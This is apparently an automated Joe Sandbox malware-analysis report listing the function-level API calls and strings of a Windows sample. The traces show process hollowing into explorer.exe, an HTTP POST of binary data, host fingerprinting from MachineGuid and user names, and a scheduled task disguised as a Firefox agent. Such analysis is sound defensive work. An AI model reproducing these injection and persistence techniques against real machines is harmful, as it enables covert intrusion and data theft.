Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: File$AddressProcProcess$CloseWrite$Memory$HandleInitPathPointerStringUnicodewnsprintf$AllocBuffersCombineCountCreateCurrentFlushInformationModuleQueryReadTempTickVirtual
String ID: "%s"$%08x%s$.exe$NtCreateProcessEx$NtCreateSection$NtCreateThreadEx$RtlCreateProcessParametersEx$RtlDestroyProcessParameters$ntdll
API String ID: 3548791621-756185880
Opcode ID: de2c6662b95484e4b98f5a65541e9683457f6652391fcd7c03e644a2460877f2
Instruction ID: 04975ec67a79d66e462d30ecda0235fc7cd5a0e543fc444528f91689b97672fc
Opcode Fuzzy Hash: de2c6662b95484e4b98f5a65541e9683457f6652391fcd7c03e644a2460877f2
Instruction Fuzzy Hash: 5AB13871A40219ABEB20DBA4CC49FAEBFBCFB09704F144065F605F7191D7B5AA44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 005A6690 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 230
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON(00000000,?,?), ref: 005A66B2
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 005A66D2
GetProcessHeap.KERNEL32(00000008,00000000), ref: 005A66EB
HeapAlloc.KERNEL32(00000000), ref: 005A66F2
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 005A6713
InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005A6738
InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 005A6771
InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005A678E
HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 005A67C7
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 005A67F0
InternetSetOptionW.WININET(00000000,0000001F,00003180,00000004), ref: 005A680A
HttpSendRequestW.WININET(00000000,Content-Type: application/octet-streamContent-Encoding: binary,000000FF,?,?), ref: 005A681E
InternetQueryDataAvailable.WININET(00000000,00000000,00000000,00000000), ref: 005A6840
GetProcessHeap.KERNEL32(00000008,00000000), ref: 005A6859
HeapAlloc.KERNEL32(00000000), ref: 005A6860
GetProcessHeap.KERNEL32(00000008,?,00000000), ref: 005A686B
HeapReAlloc.KERNEL32(00000000), ref: 005A6872
InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 005A6886
InternetCloseHandle.WININET(00000000), ref: 005A68A8
InternetCloseHandle.WININET(00000000), ref: 005A68B3
InternetCloseHandle.WININET(00000000), ref: 005A68B9
GetProcessHeap.KERNEL32(00000000,?), ref: 005A68EC
HeapFree.KERNEL32(00000000), ref: 005A68EF
GetProcessHeap.KERNEL32(00000000,?), ref: 005A68FB
HeapFree.KERNEL32(00000000), ref: 005A68FE
GetProcessHeap.KERNEL32(00000000,?), ref: 005A690A
HeapFree.KERNEL32(00000000), ref: 005A690D

Strings

Content-Type: application/octet-streamContent-Encoding: binary, xrefs: 005A6818
POST, xrefs: 005A67C1
`, xrefs: 005A6748

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: Heap$Internet$Process$AllocCloseFreeHandleOption$ByteCharHttpMultiOpenQueryRequestWide$AgentAvailableConnectDataFileObtainReadSendStringUser
String ID: Content-Type: application/octet-streamContent-Encoding: binary$POST$`
API String ID: 2744214989-3343008755
Opcode ID: 7f20789120b70c8e0ad0ad395b16b20c145ec6793f8793a15f67126c84cd8d1d
Instruction ID: e57985d2628f7b147f4322881e66fcf2b6705a069a12c8567c40a02cd267267a
Opcode Fuzzy Hash: 7f20789120b70c8e0ad0ad395b16b20c145ec6793f8793a15f67126c84cd8d1d
Instruction Fuzzy Hash: B7716271A40219BBEB109BA4DC49FBEBBBCFF06710F144119FA11F7291DBB499049BA4

Uniqueness

Uniqueness Score: -1.00%

Function 005A5AE0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 285
injectionthreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll,NtUnmapViewOfSection), ref: 005A5B03
GetProcAddress.KERNEL32(00000000), ref: 005A5B0A
CreateProcessW.KERNEL32(C:\Windows\system32\explorer.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 005A5BCD
NtQueryInformationProcess.NTDLL ref: 005A5BEA
ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 005A5C04
GetThreadContext.KERNEL32(?,00010007), ref: 005A5C14
VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040), ref: 005A5C48
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 005A5C72
WriteProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 005A5CAB
ReadProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 005A5D92
WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 005A5DAA
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,00000000), ref: 005A5E05
SetThreadContext.KERNEL32(?,00010007,?,?,00000000), ref: 005A5E20
ResumeThread.KERNEL32(?,?,?,00000000), ref: 005A5E29
CloseHandle.KERNEL32(?), ref: 005A5E38
CloseHandle.KERNEL32(00000000), ref: 005A5E3D

Strings

C:\Windows\system32\certutil.exe, xrefs: 005A5B40
C:\Windows\system32\explorer.exe, xrefs: 005A5B50, 005A5BCC
ntdll, xrefs: 005A5AFE
.reloc, xrefs: 005A5CFF
NtUnmapViewOfSection, xrefs: 005A5AF9

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: Process$Memory$Write$HandleThread$CloseContextRead$AddressAllocCreateInformationModuleProcQueryResumeVirtual
String ID: .reloc$C:\Windows\system32\certutil.exe$C:\Windows\system32\explorer.exe$NtUnmapViewOfSection$ntdll
API String ID: 918112823-4001407722
Opcode ID: 19bbaf67179d01655aa5ce6aa13cc5cd06cea0f9532e950ffbff5d11b1b471f6
Instruction ID: 93f9c1a8c148125b4c0d8e9b7d4b21f7e89f7bfa49e308088af6798402ed0b81
Opcode Fuzzy Hash: 19bbaf67179d01655aa5ce6aa13cc5cd06cea0f9532e950ffbff5d11b1b471f6
Instruction Fuzzy Hash: 82B16C71E00619AFDF14CFA8DC84FAEBBB5FB49304F2440A5E905AB291E7319945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 005A8306 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 177
sleepencryptionfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 005A7DC6
Sleep.KERNEL32(00000000), ref: 005A82F6
InitializeCriticalSection.KERNEL32(005AA080), ref: 005A8352

Part of subcall function 005A7000: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 005A7037
Part of subcall function 005A7000: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 005A7053
Part of subcall function 005A7000: GetProcessHeap.KERNEL32(00000008,?), ref: 005A7062
Part of subcall function 005A7000: HeapAlloc.KERNEL32(00000000), ref: 005A7069
Part of subcall function 005A7000: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 005A7086
Part of subcall function 005A7000: RegCloseKey.ADVAPI32(80000002), ref: 005A7098

GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 005A837F
StringFromGUID2.OLE32(?,?,00000080), ref: 005A83D8
wsprintfA.USER32 ref: 005A83EF
CreateMutexW.KERNEL32(00000000,00000001,?), ref: 005A8403
GetLastError.KERNEL32 ref: 005A840E
WSAStartup.WS2_32(00000202,?), ref: 005A844C
CryptAcquireContextA.ADVAPI32(005AA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 005A8465
CryptAcquireContextA.ADVAPI32(005AA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 005A8481
CoInitializeEx.OLE32(00000000,00000000), ref: 005A84CC
ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 005A84E3
CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 005A8502

Strings

C:\, xrefs: 005A837A
Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 005A8459, 005A8476
%temp%\%paths%, xrefs: 005A84DE

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: AcquireContextCreateCryptHeapInitializeQuerySleepValue$AllocCloseCriticalEnvironmentErrorExpandFileFromInformationLastMutexOpenProcessSectionStartupStringStringsVolumewsprintf
String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 2004664451-2941900213
Opcode ID: 90b64a82f3c845b1e0d5cd9aece5b2c6bc2b364ee9055a5f82c971bfc9ddb195
Instruction ID: 0149498c2fc03daee805c59de0e8bb09e016553fe4a5a19efb32715f5b3c2f3f
Opcode Fuzzy Hash: 90b64a82f3c845b1e0d5cd9aece5b2c6bc2b364ee9055a5f82c971bfc9ddb195
Instruction Fuzzy Hash: C661F870A44309AFEB10DB60DC4DBADBFB8BF16704F1041A9E505EB182EBB45A48CB95

Uniqueness

Uniqueness Score: -1.00%

Function 005A7640 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 174
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LsaOpenPolicy.ADVAPI32(00000000,005AA060,00000001,?), ref: 005A767C
LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 005A768F
GetProcessHeap.KERNEL32(00000008,?), ref: 005A76AB
HeapAlloc.KERNEL32(00000000), ref: 005A76B2
LsaFreeMemory.ADVAPI32(?), ref: 005A76EC
LsaClose.ADVAPI32(?), ref: 005A76F5
GetComputerNameW.KERNEL32(?,?), ref: 005A7714
GetUserNameW.ADVAPI32(?,00000101), ref: 005A7725
wsprintfA.USER32 ref: 005A77A6
wsprintfA.USER32 ref: 005A77D9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A7830
HeapFree.KERNEL32(00000000), ref: 005A7833
GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A783C
HeapFree.KERNEL32(00000000), ref: 005A783F

Strings

%d|%s|%.16s|, xrefs: 005A77A0
%s|%d.%d (%d)|%S|%S|%S, xrefs: 005A77D3
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 005A7736

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: Heap$FreeProcess$NamePolicywsprintf$AllocCloseComputerInformationMemoryOpenQueryUser
String ID: %d|%s|%.16s|$%s|%d.%d (%d)|%S|%S|%S$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
API String ID: 3257352186-369990036
Opcode ID: 4288cabd0b41a18e7e64004c453c2c71f10ab25cb7f3fd9fcce6882d891ab45a
Instruction ID: 5f6fae09400d5668bd764a8a4b43a857be9c2ea636a3c600fec5f57f85fab98e
Opcode Fuzzy Hash: 4288cabd0b41a18e7e64004c453c2c71f10ab25cb7f3fd9fcce6882d891ab45a
Instruction Fuzzy Hash: B451B271A0025DAFEB11DFA4CC48BAFBFB9FF4A300F0440A5E944A7152D7709A45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005A7850 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 434
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIA.SHLWAPI(?,?,00000000), ref: 005A789A
wnsprintfA.SHLWAPI ref: 005A7932
wsprintfA.USER32 ref: 005A7959
lstrcmpA.KERNEL32(?,Start), ref: 005A7BDB
EnterCriticalSection.KERNEL32(005AA080), ref: 005A7C34
GetProcessHeap.KERNEL32(00000008,?), ref: 005A7C98
HeapAlloc.KERNEL32(00000000), ref: 005A7C9F
GetProcessHeap.KERNEL32(00000008,?,?), ref: 005A7CAA
HeapReAlloc.KERNEL32(00000000), ref: 005A7CB1
LeaveCriticalSection.KERNEL32(005AA080), ref: 005A7D08

Part of subcall function 005A5E60: GetModuleHandleW.KERNEL32(ntdll), ref: 005A5E7D
Part of subcall function 005A5E60: GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 005A5E91
Part of subcall function 005A5E60: GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 005A5E9C
Part of subcall function 005A5E60: GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 005A5EA7
Part of subcall function 005A5E60: GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 005A5EB2
Part of subcall function 005A5E60: GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 005A5EBD
Part of subcall function 005A5E60: GetTempPathW.KERNEL32(000000F6,?), ref: 005A5ED6
Part of subcall function 005A5E60: wnsprintfW.SHLWAPI ref: 005A5F11
Part of subcall function 005A5E60: PathCombineW.SHLWAPI(?,?,?), ref: 005A5F2B
Part of subcall function 005A5E60: CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 005A5F52
Part of subcall function 005A5E60: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005A5F76
Part of subcall function 005A5E60: SetEndOfFile.KERNEL32(00000000), ref: 005A5F79
Part of subcall function 005A5E60: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005A5F86
Part of subcall function 005A5E60: wnsprintfW.SHLWAPI ref: 005A5FA4

GetProcessHeap.KERNEL32(00000000,?), ref: 005A7D27
HeapFree.KERNEL32(00000000), ref: 005A7D2E

Strings

%s|%s, xrefs: 005A7953
Start, xrefs: 005A7BD5
%d|%s|%.16s|, xrefs: 005A7921
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 005A78D0

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: Heap$AddressProc$File$Processwnsprintf$AllocCriticalPathSection$CombineCreateEnterFreeHandleLeaveModulePointerTempWritelstrcmpwsprintf
String ID: %d|%s|%.16s|$%s|%s$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$Start
API String ID: 851647271-3778496198
Opcode ID: 53abe37945268fc5fa3ec6b6b1281408828d3644a28646fe7fe9fd67992309f7
Instruction ID: 817fe1e105b9daadb563ecf18f90add3807d09d21182fdd01d06bd8b87e13f33
Opcode Fuzzy Hash: 53abe37945268fc5fa3ec6b6b1281408828d3644a28646fe7fe9fd67992309f7
Instruction Fuzzy Hash: 7BE1E430A0825E9FDB298F68CC5477E7FA6BF9B700F1981ADD85697242EB308D45C790

Uniqueness

Uniqueness Score: -1.00%

Function 005A8330 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 121encryptionfilesynchronizationCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(005AA080), ref: 005A8352

Part of subcall function 005A7000: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 005A7037
Part of subcall function 005A7000: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 005A7053
Part of subcall function 005A7000: GetProcessHeap.KERNEL32(00000008,?), ref: 005A7062
Part of subcall function 005A7000: HeapAlloc.KERNEL32(00000000), ref: 005A7069
Part of subcall function 005A7000: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 005A7086
Part of subcall function 005A7000: RegCloseKey.ADVAPI32(80000002), ref: 005A7098

GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 005A837F
StringFromGUID2.OLE32(?,?,00000080), ref: 005A83D8
wsprintfA.USER32 ref: 005A83EF
CreateMutexW.KERNEL32(00000000,00000001,?), ref: 005A8403
GetLastError.KERNEL32 ref: 005A840E
ExitProcess.KERNEL32 ref: 005A8513

Part of subcall function 005A2490: GetTickCount.KERNEL32 ref: 005A2492

WSAStartup.WS2_32(00000202,?), ref: 005A844C
CryptAcquireContextA.ADVAPI32(005AA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 005A8465
CryptAcquireContextA.ADVAPI32(005AA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 005A8481
CoInitializeEx.OLE32(00000000,00000000), ref: 005A84CC
ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 005A84E3
CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 005A8502

Strings

C:\, xrefs: 005A837A
Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 005A8459, 005A8476
%temp%\%paths%, xrefs: 005A84DE

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: AcquireContextCreateCryptHeapInitializeProcessQueryValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 267019445-2941900213
Opcode ID: 4ad34b55e052c627de7130db5ebbb2d76c32b0a3f4768c16116edca77249eb01
Instruction ID: 30f150177517b4b38b7b58f87e63e8bb10d074c8cb3ea7243287f555413ca3db
Opcode Fuzzy Hash: 4ad34b55e052c627de7130db5ebbb2d76c32b0a3f4768c16116edca77249eb01
Instruction Fuzzy Hash: F941E670A40308AFEB20DB60DD4EFAD7B78FB16705F108065F605EA1D2EBB05A48DB95

Uniqueness

Uniqueness Score: -1.00%

Function 005A8F20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86memoryencryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32(00000020,?), ref: 005A8F38

Part of subcall function 005A2630: GetProcessHeap.KERNEL32(00000008,AAAAAAAB,?,?,?,?,005A8F85,00000000), ref: 005A2652
Part of subcall function 005A2630: HeapAlloc.KERNEL32(00000000,?,?,?,?,005A8F85,00000000), ref: 005A2659

GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A8F95
HeapFree.KERNEL32(00000000), ref: 005A8F9C
wsprintfA.USER32 ref: 005A8FCF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A9008
HeapFree.KERNEL32(00000000), ref: 005A900B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A9010
HeapFree.KERNEL32(00000000), ref: 005A9013

Strings

VoYGkc5R, xrefs: 005A8FB7
%d|%s|%s|%s, xrefs: 005A8FC9

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: Heap$Process$Free$AllocCryptRandomwsprintf
String ID: %d|%s|%s|%s$VoYGkc5R
API String ID: 4113358155-4073333701
Opcode ID: 18acb15bc2045a5586cab438664e33c3188cf7d56bc2c40d9c1f274baec7622e
Instruction ID: 2f27551eda7d998b08ded19eda25573120799a9b461be85f7e54b10afadbf58b
Opcode Fuzzy Hash: 18acb15bc2045a5586cab438664e33c3188cf7d56bc2c40d9c1f274baec7622e
Instruction Fuzzy Hash: 0A21B571A003086BEB1097A49C0EFAF7E79FB46704F040124FA05AB1C2EA659909C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 005A6AC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95memorycomCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005A6AD7
CoCreateInstance.OLE32(005A1020,00000000,00000001,005A1000,?), ref: 005A6AF4
SysAllocString.OLEAUT32(\Mozilla), ref: 005A6B34
SysFreeString.OLEAUT32(?), ref: 005A6B6B
SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 005A6B78
SysFreeString.OLEAUT32(00000000), ref: 005A6B8F

Strings

Firefox Default Browser Agent 458046B0AF4A39CB, xrefs: 005A6B73
\Mozilla, xrefs: 005A6B2F

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: String$AllocFree$CreateInitInstanceVariant
String ID: Firefox Default Browser Agent 458046B0AF4A39CB$\Mozilla
API String ID: 478541636-252850850
Opcode ID: 2121eeaa088bb9d3d88249c5ea91be2502a4c7d141fb1537aea30c36e4ada561
Instruction ID: fd5162319f4bd90fdeb2274f73f3bb5da1823938d971c2f1b93891765d6812df
Opcode Fuzzy Hash: 2121eeaa088bb9d3d88249c5ea91be2502a4c7d141fb1537aea30c36e4ada561
Instruction Fuzzy Hash: 7E317074F00258AFE7009B68CC89BAEBFB8FF4A305F044198E945E7251D671AD85CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 005A6200 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 005A620D
OpenProcessToken.ADVAPI32(00000000), ref: 005A6214
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 005A6229
CloseHandle.KERNEL32(?), ref: 005A6236
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 005A6260
CloseHandle.KERNEL32(?), ref: 005A626B

Strings

SeShutdownPrivilege, xrefs: 005A6222

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 158869116-3733053543
Opcode ID: 2b7bf8b8e5b65758f8b39c3e3aeebd27a1fbd2df212cac6759444d4c9ab564c2
Instruction ID: ff9dad5c70e72834ce09769ef404c670b3a02451d333b9c54ef9c16b3530d7f5
Opcode Fuzzy Hash: 2b7bf8b8e5b65758f8b39c3e3aeebd27a1fbd2df212cac6759444d4c9ab564c2
Instruction Fuzzy Hash: 09014F35A40218BBEB109BA09D0EBEF7BB8FB05701F100154B904A6191D7715E18A7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00FB421C Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00FB4228
IsDebuggerPresent.KERNEL32 ref: 00FB42F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FB4314
UnhandledExceptionFilter.KERNEL32(?), ref: 00FB431E

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: a79a902ff34c98115f1ce99119d0dd6879cc2ecff05b06402862c6a4232d98a5
Instruction ID: 79d9bcdab080bc46612c267245ba1745281a5652bb15c78a3896d0d6d32bc672
Opcode Fuzzy Hash: a79a902ff34c98115f1ce99119d0dd6879cc2ecff05b06402862c6a4232d98a5
Instruction Fuzzy Hash: FE312975D4521CDBDB10DFA5DE8ABCDBBB8BF08304F1040AAE40CAB251EB759A859F44

Uniqueness

Uniqueness Score: -1.00%

Function 00FB695B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00FB6A53
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00FB6A5D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00FB6A6A

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 5889ff6aadf7254b84b2ac70d92174fa486accf345e9415ea6e3525db6655336
Instruction ID: 67f279a0ad415a7048a00c321d8439d0214335572f7df301f9f5d27c8f2902e0
Opcode Fuzzy Hash: 5889ff6aadf7254b84b2ac70d92174fa486accf345e9415ea6e3525db6655336
Instruction Fuzzy Hash: E631D27494122C9BCB21DF25DD89BDCBBB8BF08310F5081EAE41CA7251E734AB859F44

Uniqueness

Uniqueness Score: -1.00%

Function 00FB75A2 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00FB75A1,?,?,?,?,?,00FBC8FA), ref: 00FB75C4
TerminateProcess.KERNEL32(00000000,?,00FB75A1,?,?,?,?,?,00FBC8FA), ref: 00FB75CB
ExitProcess.KERNEL32 ref: 00FB75DD

Memory Dump Source

